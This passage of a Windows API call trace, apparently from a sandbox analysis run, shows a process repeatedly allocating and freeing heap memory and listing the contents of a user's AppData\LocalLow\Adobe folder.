0x9c5d1d0 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.249] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.249] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.249] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88f38 [0060.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0060.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88f38 | out: hHeap=0x660000) returned 1 [0060.250] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.250] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.250] PathFindFileNameW (pszPath="") returned="" [0060.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.250] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x38) returned 0x327cb80 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adc48 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0060.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0060.251] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32696d0 | out: hHeap=0x660000) returned 1 [0060.251] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.252] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.252] HeapFree (in: 